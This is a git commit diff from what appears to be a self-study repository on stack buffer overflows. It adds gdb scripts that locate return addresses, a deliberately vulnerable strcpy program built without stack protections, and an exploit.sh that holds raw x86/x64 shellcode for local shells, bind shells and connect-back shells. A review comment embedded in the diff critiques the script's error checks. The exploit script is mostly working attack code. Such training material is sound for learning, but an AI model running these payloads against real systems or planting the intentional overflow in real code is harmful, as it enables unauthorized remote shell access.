authorToni Uhlig <matzeton@googlemail.com>2017-04-13 03:57:20 +0200
committerToni Uhlig <matzeton@googlemail.com>2017-04-13 03:57:20 +0200
commit315745e24bf37a5fd8324e737272dc4b594dfd7e (patch)
tree05bd3769284f7d592b4ea11544532503a3f9299c
parentbd131dc1d623c0708619ec95c5ece591e3462e89 (diff)
return adr finder
-rw-r--r--.gitignore1
-rw-r--r--Makefile2
-rw-r--r--dump32.gdb3
-rw-r--r--dump64.gdb3
-rwxr-xr-xexploit.sh117
-rw-r--r--funcjmp_simple.c2
-rw-r--r--overflow.c9
7 files changed, 101 insertions, 36 deletions
diff --git a/.gitignore b/.gitignore
index bd8d165..17082e4 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,4 +8,5 @@ sc-test
sc-test_x64
funcjmp_simple
funcjmp_ext
+funcjmp_ext_x86
format
diff --git a/Makefile b/Makefile
index 8854367..5e5ba04 100644
--- a/Makefile
+++ b/Makefile
@@ -4,7 +4,7 @@ RM := rm
CC := gcc
STRIP := strip
LBITS := $(shell getconf LONG_BIT)
-CFLAGS += -Wall
+CFLAGS += -Wall -O0
OCFLAGS += -zexecstack -znorelro -fno-stack-protector -fno-pie -ggdb -static
X86_FLAGS = -m32 -mpreferred-stack-boundary=2
X64_FLAGS = -m64 -mpreferred-stack-boundary=4
diff --git a/dump32.gdb b/dump32.gdb
new file mode 100644
index 0000000..aa088da
--- /dev/null
+++ b/dump32.gdb
@@ -0,0 +1,3 @@
+run
+info r
+x/300xw $esp-0x300
diff --git a/dump64.gdb b/dump64.gdb
new file mode 100644
index 0000000..3facd15
--- /dev/null
+++ b/dump64.gdb
@@ -0,0 +1,3 @@
+run
+info r
+x/300xw $rsp-0x300
diff --git a/exploit.sh b/exploit.sh
index 55d79e1..d986fe4 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -1,41 +1,100 @@
#!/bin/sh
-# shellcode generated with metasploit (exec /bin/sh):
+# generate shellcode with metasploit (exec /bin/sh):
# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# uses (currently) only self-written shellcode ..
+
+DIR="$(dirname $0)"
+
+find_return_adr32() {
+ if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
+ return 1
+ fi
+ ret=$(gdb -batch -x "${DIR}/dump32.gdb" --args $1 $2)
+ adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
+ if [ $? -ne 0 ]; then
+ echo "$0: no adr found: ${adr}"
+ return 1
+ fi
+ chs=$(echo ${adr} | cut -d ' ' -f $3)
+ if [ $? -ne 0 ]; then
+ echo "$0: check adr index: $3"
+ return 1
+ fi
+ echo $(echo "${chs}" | sed 's/0x\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)\(.\{2\}\)/\\x\4\\x\3\\x\2\\x\1/')
+ return 0
+}
+
+find_return_adr64() {
+ if [ -z "$1" -o -z "$2" -o -z "$3" ]; then
+ return 1
+ fi
+ ret=$(gdb -batch -x "${DIR}/dump64.gdb" --args $1 $2)
+ adr=$(echo "${ret}" | sed -n 's/\(.*\):\s\+0x90909090\s\+0x90909090\s\+0x90909090\s\+0x90909090/\1/p' | sort)
+ if [ $? -ne 0 ]; then
+ echo "$0: no adr found: ${adr}"
+ return 1
+ fi
+ chs=$(echo ${adr} | cut -d ' ' -f $3)
+ if [ $? -ne 0 ]; then
+ echo "$0: check adr index: $3"
+ return 1
+ fi
+python - <<EOF
+import struct, binascii
+print repr(struct.pack('<Q', int('$chs',16)))[1:33]
+EOF
+ return 0
+}
+
+if [ ! -f "${DIR}/overflow" -o ! -f "${DIR}/overflow_x64" ]; then
+ echo "$0: run make first!"
+ exit 1
+fi
+
+RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
+RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)
+
+
if [ -z "$1" ]; then
- echo "$0 [local|bind|connect]"
+ echo "$0 [local32|local64|bind32|bind64|connect32]"
exit 1
fi
-echo "$0: exec exploit ( x$(getconf LONG_BIT) ) .."
-if [ "$1" = "local" ]; then
- if [ $(getconf LONG_BIT) -eq 32 ]; then
- # 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
- # uses own shellcode: shellcode/hello.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\xc4\xf2\xff\xbf"'`
- else
- # 133xNOP + shellcode(34) + 145xNOP + return addr
- # uses own shellcode: shellcode/execve_x64.o
- ./overflow_x64 `python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "\x02\xe7\xff\xff\xff\x7f"'`
- fi
-elif [ "$1" = "bind" ]; then
- if [ $(getconf LONG_BIT) -eq 32 ]; then
- # 85xNOP + shellcode(134) + 85xNOP + return addr
- # uses own shellcode: shellcode/socket.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
- else
- # 100xNOP + shellcode(149) + 63xNOP + return addr
- # uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
- ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
- fi
-elif [ "$1" = "connect" ]; then
- if [ $(getconf LONG_BIT) -eq 32 ]; then
- # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
- # uses own shellcode: shellcode/connect.asm (x86-nasm)
- ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
- fi
+if [ "$1" = "local32" ]; then
+
+ # NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
+ # uses own shellcode: shellcode/hello.asm (x86-nasm)
+ echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
+ ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
+
+elif [ "$1" = "local64" ]; then
+
+ # NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
+ # uses own shellcode: shellcode/execve_x64.o
+ echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
+ gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
+
+elif [ "$1" = "bind32" ]; then
+
+ # 85xNOP + shellcode(134) + 85xNOP + return addr
+ # uses own shellcode: shellcode/socket.asm (x86-nasm)
+ ./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
+
+elif [ "$1" = "bind64" ]; then
+
+ # 100xNOP + shellcode(149) + 63xNOP + return addr
+ # uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
+ ./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05" + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
+
+elif [ "$1" = "connect32" ]; then
+
+ # 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
+ # uses own shellcode: shellcode/connect.asm (x86-nasm)
+ ./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
+
else
$0
fi
+
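Review bot: The `if [ $? -ne 0 ]` right after `adr=$(... | sed -n '...p' | sort)` in find_return_adr32 (and the same line in find_return_adr64) only sees the exit status of `sort`, the last element of the pipeline; `sed -n` with `/p` exits 0 whether or not anything matched, so the "no adr found" branch is unreachable and an empty `adr` flows on into `cut`. The same applies to the check after `chs=$(echo ${adr} | cut -d ' ' -f $3)`, since `cut` also exits 0 when the requested field is absent. Test the captured values instead: `if [ -z "${adr}" ]; then` and `if [ -z "${chs}" ]; then`. Separately, `$1 $2` in the gdb invocation and `$0` in `DIR="$(dirname $0)"` are unquoted and will word-split on paths containing spaces; `"$1" "$2"` and `"$0"` avoid that.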
diff --git a/funcjmp_simple.c b/funcjmp_simple.c
index 63946c8..97db760 100644
--- a/funcjmp_simple.c
+++ b/funcjmp_simple.c
@@ -5,7 +5,7 @@
#define INTEL_ASM(_asm_str) asm volatile(".intel_syntax noprefix"); \
asm volatile(_asm_str); \
asm volatile(".att_syntax prefix");
-#define JUMPABLE_FUNC(fname) __attribute__ ((__cdecl__)) int fname(void)
+#define JUMPABLE_FUNC(fname) int fname(void)
#define JMP_FUNC_DECL(func) void *fptr = (void *)( &func );
#define JMP_TO_FUNC \
INTEL_ASM(" \
diff --git a/overflow.c b/overflow.c
index 8fb07b9..1d9e4cf 100644
--- a/overflow.c
+++ b/overflow.c
@@ -13,20 +13,19 @@
#define BUFLEN 300
void
-overflow(const char *src, char *dst)
+overflow(const char *src)
{
+ char buf[BUFLEN];
/* exploitable function */
- strcpy(dst, src);
+ strcpy(&buf[0], src);
/* nothing to do, just return */
}
int
main(int argc, char **argv)
{
- char buf[BUFLEN];
-
if (argc > 1) {
- overflow(argv[1], buf);
+ overflow(argv[1]);
} else {
fprintf(stderr, "arg1 missing\n");
return(1);